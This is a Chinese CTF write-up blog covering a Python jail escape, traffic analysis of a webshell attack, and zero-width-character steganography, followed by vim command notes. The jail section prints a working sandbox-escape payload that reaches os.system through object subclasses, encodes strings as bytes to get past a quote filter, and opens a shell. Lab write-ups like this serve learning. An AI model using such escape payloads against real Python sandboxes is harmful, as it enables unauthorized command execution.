少女祈祷中...

我准备试试看深入试试看misc,老是做web 太无聊了

[HNCTF 2022]calc_jail_beginner_level4.0.5

第一次接触NC

1.得到地址,打开Kali

1
nc node5.anna.nssctf.cn 29086

image-20250428232930331

即可进入输入页面

2.考察Python沙盒逃逸(类似于SSTI)

什么是python沙盒逃逸?

在已知禁用的函数下进行恶意注入

3.前面都类似SSTI

类似SSTI需要一步一步调用OS模板来调用system函数

不同的是我们需要用print来输出(我们已经进入py环境了)

1
print(().__class__.__mro__[1].__subclasses__()[139].__init__.__globals__)

发现有回显,就说明成功了

4.’’,””被禁用,怎么引用system?

使用byte + decode

1
().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decode())

成功链接

image-20250429004445276

1
2
3
ls
nl flag
即可

WEBshell

1.

单位网站被黑客挂马,请您从流量中分析出webshell,进行回答:

黑客登录系统使用的密码是_____。。得到的flag请使用NSSCTF{}格式提交。

1
http contains "password"

请求里面包含 “ “

image-20250602225931609

1
Admin123!@#

2.

黑客修改了一个日志文件,文件的绝对路径为__/var/www/html/data/Runtime/Logs/Home/21_08_07.log_____。

1
http contains "log"

发现攻击企图

image-20250602230325668

发现写入文件:

image-20250602231306075

翻译:

image-20250602231253866

3.

黑客获取webshell之后,权限是_____。

权限级别 代表用户 控制范围 典型利用手段
受限用户 www-data/nginx 仅Web目录读写、数据库连接 文件遍历、数据库窃取
普通用户 /home/user 用户目录文件、当前用户进程 SSH密钥劫持、环境变量注入
ROOT权限 uid=0 全系统控制 (最危险阶段) 内核提权、SSH后门植入

我们可以直接搜索:

image-20250602233304829

发现是受限用户

1
www-data

[UTCTF 2020]Zero

考察点:隐写

我的方法:

打开VS发现:

image-20250604125331824

存在奇奇怪怪的东西:[U+202C]

问AI发现是隐写:

image-20250604125507472

打开网站就可以直接解密:

Unicode Steganography with Zero-Width Characters

image-20250604125614553

答案WP:

我们打开kali使用vim打开康康

1
vim '/home/flitar/桌面/MISC/zero.txt' 

image-20250604124036531

image-20250604124414684

关于VIM的指令:

编辑命令

1
2
3
4
5
6
7
8
9
i			#进入插入模式
a #光标后插入
o #下方插入新行
O #上方插入新行
x #删除光标处字符
dw #删除单词
dd #删除整行
u #撤销操作
Ctrl+r #重做操作

退出Vim

1
2
3
4
5
6
7
:wq     	# 保存并退出
:x # 等同于:wq (更快捷)
ZZ # (大写) 保存并退出
:q! # 强制退出不保存修改
ZQ # (大写) 等价于:q!
:w # 保存文件
:w filename # 另存为新文件